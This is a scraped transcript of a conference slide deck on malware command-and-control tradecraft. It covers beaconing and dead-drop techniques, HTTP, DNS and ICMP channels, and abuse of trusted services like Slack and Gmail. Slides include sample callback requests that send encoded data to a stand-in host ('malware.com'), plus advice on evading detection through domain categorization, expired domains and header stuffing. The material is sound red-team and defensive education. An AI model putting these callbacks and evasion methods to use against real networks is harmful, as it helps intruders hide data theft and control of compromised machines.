flying a false flag - i.blackhat.com · [ agenda ] c2 methodology techniques and theory c2 channels...
TRANSCRIPT
![Page 1: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/1.jpg)
Flying AFalse Flag
Advanced C2, Trust Conflicts, and Domain Takeover
![Page 2: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/2.jpg)
[ bio ]
Nick Landers : @monoxgas
Technical Lead,
Silent Break Security
▪ Research & Development
▪ Offensive Operations
▪ Consulting
▪ Dark Side Ops
▪ Shellcode RDI (sRDI)
▪ Red Team Toolkit (RTT)
![Page 3: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/3.jpg)
[ agenda ]
▪ C2 Methodology▪ Techniques and Theory
▪ C2 Channels▪ Classic and Modern
▪ Trust Conflicts▪ Existing and Fresh
▪ Cloud Abuse & Takeover▪ The death of an IP
▪ Final Thoughts
![Page 4: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/4.jpg)
command&
control
![Page 5: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/5.jpg)
[ software model ]
Client
Server
Perimeter
![Page 6: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/6.jpg)
[ software model ]
▪ Channel Selection
▪ Redundancy
▪ Obfuscation
▪ Serialization
▪ Encryption
▪ Trust
Client
Server
Perimeter
![Page 7: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/7.jpg)
[ malware model ]
Implant
LP
Perimeter
(listening post)
▪ Channel Selection
▪ Redundancy
▪ Obfuscation
▪ Serialization
▪ Encryption
▪ Trust
![Page 8: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/8.jpg)
[ define: c2 ]
User Input | “upload file.ext”
Parsing & Prep | fdata = read(file.ext)
Serialization | 0x420xFF0x420x54
Data Transfer | page?id=AABDlwIEjrl
Deserialization | 0x420xFF0x420x54
Execution | write(fdata)] Implant
] LP
![Page 9: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/9.jpg)
[ define: c2 ]
User Input | “upload file.ext”
Parsing & Prep | fdata = read(file.ext)
Serialization | 0x420xFF0x420x54
Data Transfer | page?id=AABDlwIEjrl
Deserialization | 0x420xFF0x420x54
Execution | write(fdata)
[C2
] Implant
] LP
![Page 10: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/10.jpg)
[ methodology ]
C2 = Technique
[strategy of execution]
+
Channel
[medium for communication]
![Page 11: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/11.jpg)
[ methodology ]
C2 = Technique
[strategy of execution]
+
Channel
[medium for communication]
![Page 12: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/12.jpg)
[ technique ]
Implant
LP▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
![Page 13: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/13.jpg)
[ technique ]
Implant
LP
“Reverse”
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
![Page 14: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/14.jpg)
[ technique ]
Implant
Operator▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing“Bind”
![Page 15: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/15.jpg)
Attacker Time
Tasking
Results
Tasking
Results
Victim
(Processing)
Efficient
Attribution
Conditional
[ implementation - solicitation ]knocking
web shells
bind shells
![Page 16: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/16.jpg)
[ technique ]
Implant
Server
“Beacon”
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
![Page 17: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/17.jpg)
[ technique ]
Implant
Server
“Shell”
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
![Page 18: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/18.jpg)
[ implementation - beaconing ]
Tasking
Time
Results
(Processing)
Victim
Consistent
Simple
Inefficient
Action Delay
web transports
basic agents
LP
![Page 19: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/19.jpg)
Tasking
(Hold Thread) (Hold Thread)
15s 30s
Results
TimeVictim
Responsive
Efficient
Conditional
Obscure
[ implementation – long polling ]
![Page 20: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/20.jpg)
[ technique ]
Implant
A
B
C
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
![Page 21: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/21.jpg)
[ technique ]
A
B
C
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
Implant
![Page 22: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/22.jpg)
[ technique ]
Implant
3rd Party
LP
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
![Page 23: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/23.jpg)
[ technique ]
Bastion
LP
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
Bastion
Implant
![Page 24: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/24.jpg)
[ technique ]
3rd Party
Operator
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
Implant
![Page 25: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/25.jpg)
Tasking3rd Party
Tasking
Results
Results
TimeVictim
Stealth
Complexity
Action Delay
[ implementation – dead drop ]
Attacker Attacker
![Page 26: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/26.jpg)
channels
![Page 27: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/27.jpg)
[ sockets ]
host : DESKTOP3os : win1903user : AdminEOF
implant
malware.com
Responsive
Simple
Still Popular
start simple®
![Page 28: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/28.jpg)
[ sockets ]
nqPMcmBWJbpS1Prb4aZA5wT7rKeXrX6YNiMrBeeMH6deHNWPNRFmdxEOF
implant
malware.com
Responsive
Simple
+ Encryption
![Page 29: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/29.jpg)
[ sockets ]
nqPMcmBWJbpS1Prb4aZA5wT7rKeXrX6YNiMrBeeMH6deHNWPNRFmdxEOF
implant
malware.com
Responsive
Simple
+ Encryption
+ SSL
![Page 30: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/30.jpg)
[ sockets ]
implant
malware.com
nqPMcmBWJbpS1Prb4aEOF
ZA5wT7rKeXrX6YNiMrEOF
Responsive
Simple
+ Encryption
+ SSL
+ Chunking
![Page 31: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/31.jpg)
[ sockets ]
implant
malware.com
Observer
nqPMcmBWJbpS1Prb4aEOF
ZA5wT7rKeXrX6YNiMrEOF
1: Destination
![Page 32: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/32.jpg)
[ sockets ]
implant
malware.com
Observer
nqPMcmBWJbpS1Prb4aEOF
ZA5wT7rKeXrX6YNiMrEOF
1: Destination2: Protocol ?
![Page 33: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/33.jpg)
[ sockets ]
implant
malware.com
Observer
nqPMcmBWJbpS1Prb4aEOF
ZA5wT7rKeXrX6YNiMrEOF
1: Destination2: Protocol ?3: Volume
![Page 34: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/34.jpg)
[ sockets ]
implant
malware.com
Observer
ZA5wT7rKeXrX6YNiMrEOF
1: Destination2: Protocol3: Volume4: Perimeter
![Page 35: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/35.jpg)
[ attacker priorities ]
1: Trust- Repositories (categorization, blacklists)- Takeover primitives- Piggybacking
2: Content- Masquerading (charset, frequency, volume)
3: Vector- Protocol and port + details- Orientation and architecture- Structure limitations
![Page 36: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/36.jpg)
[ layers ]
Network
Transport
Session
Presentation
Application
…
comp sci strikes back
![Page 37: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/37.jpg)
[ layers ]
Network
Transport
Session
Presentation
Application
…
comp sci strikes back
defensivecoverage
![Page 38: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/38.jpg)
[ layers ]
Network
Transport
Session
Presentation
Application
…
comp sci strikes back
defensivecoverage
?
![Page 39: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/39.jpg)
[ layers ]HTTP
DNS
SMB
RDP
IMAP
LDAP
NFS
POP
SMTP
…
Network
Transport
Session
Presentation
Application
…
}
![Page 40: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/40.jpg)
[ channel - http ]
GET /cb?info=aW9uZXNjdQ HTTP/1.1User-Agent: Mozilla (Win64; x64)Host: malware.comConnection: Keep-Alive
▪ Common at the perimeter
▪ Layered on TCP - Reliability
▪ Complex dialect and usage▪ Encoded binary data isn’t rare
▪ Well supported in languages - Accessibility
![Page 41: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/41.jpg)
[ channel - http + ]
POST /cb HTTP/1.1User-Agent: Mozilla (Win64; x64)Host: medicalwork.com
Authenticate: basic aW9uZXNjdQConnection: Keep-Alive
Content: Better masquerading
▪ Match/extract user-agent string
▪ Use POST requests for limited logging
▪ Use “sensitive” domains – medical / banking
▪ Embed in special headers to avoid inspection
![Page 42: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/42.jpg)
[ channel - http domains ]
GET /cb?info=aW9uZXNjdQ HTTP/1.1User-Agent: Mozilla (Win64; x64)Host: wellknown.comConnection: Keep-Alive
Trust: Domain names
▪ Domain categorization and masquerading
▪ Expired domains▪ https://www.expireddomains.net/
▪ https://www.freshdrop.com/
▪ https://www.domcop.com
▪ Subdomain abuse – http://[attacker].trusted.com
![Page 43: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/43.jpg)
[ channel - http domains ]
GET /cb?info=aW9uZXNjdQ HTTP/1.1User-Agent: Mozilla (Win64; x64)Host: wellknown.comConnection: Keep-Alive
Trust: Domain categorization
▪ Palo Alto - https://urlfiltering.paloaltonetworks.com/TestASite.aspx
▪ McAfee - https://www.trustedsource.org/en/feedback/url
▪ Blue Coat - https://sitereview.bluecoat.com/sitereview.jsp
▪ zVelo - https://tools.zvelo.com
▪ Fortinet - http://url.fortinet.net/rate/submit.php
▪ Watchguard - https://www.watchguard.com/securityportal/UrlCategorization.aspx
![Page 44: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/44.jpg)
[ channel - http domains ]
GET /cb?info=aW9uZXNjdQ HTTP/1.1User-Agent: Mozilla (Win64; x64)Host: wellknown.comConnection: Keep-Alive
Trust: Domain categorization
▪ Automated tooling▪ https://github.com/mdsecactivebreach/Chameleon
▪ https://github.com/threatexpress/domainhunter
▪ https://github.com/GhostManager/DomainCheck
▪ https://github.com/Mr-Un1k0d3r/CatMyPhish
![Page 45: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/45.jpg)
[ channel - http pipelining ]
GET /help HTTP/1.1Host: benign.com
GET /cb?info=aW9uZXNjdQ HTTP/1.1Host: malware.com
![Page 46: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/46.jpg)
[ channel - http pipelining ]
callback
Content: Reduce traffic volume
Trust: Add validity to your action space
▪ Can create benign traffic ahead of a callback
▪ Interesting alternative to domain fronting
▪ https://digi.ninja/blog/pipelining.php
benign
socket
![Page 47: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/47.jpg)
[ channel - http:websocket ]
GET /websocket HTTP/1.1...Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: c2VrdXI...
Trust: Less inspection
Vector: Add speed + push/pull
▪ Gateway support may be limited
▪ https://github.com/xorrior/raven
▪ https://github.com/ryhanson/ExternalC2/
![Page 48: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/48.jpg)
[ channel - http/2 ]
Trust: Less inspection
Vector: Add speed + push/pull
▪ Gateway support may be is likely limited
▪ Transfer size reduction
▪ Binary support – “no more encoding!”
▪ https://github.com/Ne0nd0g/merlin
HEADERS frame
DATA frame
HEADERS frame
![Page 49: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/49.jpg)
[ layers ]HTTP
DNS
SMB
RDP
IMAP
LDAP
NFS
POP
IMAP
…
Network
Transport
Session
Presentation
Application
…
}
![Page 50: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/50.jpg)
[ channel – dns ]
id : 1337type : Aqname : FEEDACDC.site.com
▪ Limited transfer size (>512 triggers TCP)
A = ~125b out | 4b back
AAAA = ~125b out | 16b back
TXT = ~125b out | ~190b back
▪ dnscat21 | PowerDNS | DNS-C2 | DNSExfiltrator | etc.
▪ Simple to detect2 (volume, name length, unique subdomains)
1 https://github.com/iagox86/dnscat22 https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152
![Page 51: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/51.jpg)
[ channel – dns + ]
id : 1337type : Aqname : FEEDACDC.site.com
▪ Blended C2 approach▪ Use for heartbeats / logic transitions
▪ Transfer alternate C2 profiles / encryption keys
▪ DNS over HTTP – DoHC21 | goDoH2
▪ Implement DNSSEC
▪ Trade throughput for trusted net blocks - 8.X.X.X
1 https://github.com/SpiderLabs/DoHC22 https://github.com/sensepost/goDoH
![Page 52: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/52.jpg)
[ layers ]
TCP
ICMP
UDP
MTCP
Network
Transport
Session
Presentation
Application
…
}
![Page 53: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/53.jpg)
[ channel - icmp ]
type : 8 (echo req)id : 123 | seq : 456payload : nqPMcmBWJbpS...
▪ Arbitrary payload size
▪ Simple development
▪ Popular in the wild1 2
▪ Simple to detect (entropy, mismatched, size)
1 https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-trojan-uses-icmp-packets-to-send-data/2 https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf
![Page 54: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/54.jpg)
[ channel - icmp + ]
type : 11 (time exceeded)[ unused [32] ][ packet [32] ]
▪ Alternative codes (timestamp, extended echo, etc.)
▪ Smaller payloads with more volume
▪ Traditional echo requests for heartbeats
▪ Binary lookup tables – single byte flags
![Page 55: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/55.jpg)
[ channel - nat punch ]
▪ Demonstrated in pwnat/chownat by Samy Kamkar1
▪ Used to learn IP address for UDP NAT bypass
▪ Can invert traffic orientation1 https://samy.pl/pwnat/
type : 8 (echo req)
1.2.3.4
type : 11 (time exceeded)[ echo req to 1.2.3.4 ]
![Page 56: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/56.jpg)
trustconflicts
![Page 57: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/57.jpg)
[ trusted assets ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Generally Dead-Drop systems
▪ Provide Inherent Stealth▪ Perimeter exclusions
▪ SIEM whitelisting
▪ Analyst evasion
![Page 58: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/58.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Twitter : twittor1 | ROKRAT2
▪ Multi-Site : HAMMERTOSS3 | Social-media-c24
1 https://github.com/PaulSec/twittor2 https://blog.talosintelligence.com/2017/04/introducing-rokrat.html3 https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf4 https://github.com/woj-ciech/Social-media-c2
![Page 59: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/59.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Slack : SlackShell1 | c2s2 | slack-c2bot3
▪ Skype : skype-dev-bots4 ?
1 https://github.com/bkup/SlackShell2 https://github.com/j3ssie/c2s3 https://github.com/praetorian-code/slack-c2bot4 https://github.com/microsoft/skype-dev-bots
![Page 60: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/60.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Gmail : Gcat1 | Gdog2
▪ Exchange : ESET LightNeuron3
1 https://github.com/byt3bl33d3r/gcat2 https://github.com/maldevel/gdog3 https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
![Page 61: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/61.jpg)
[ poc - postoffice ]
▪ Account piggybacking
▪ SendGrid for server transit
▪ Data stuffing in X-Header
▪ Rule to auto-hide messages
▪ Credential reuse via WinInet + Vault
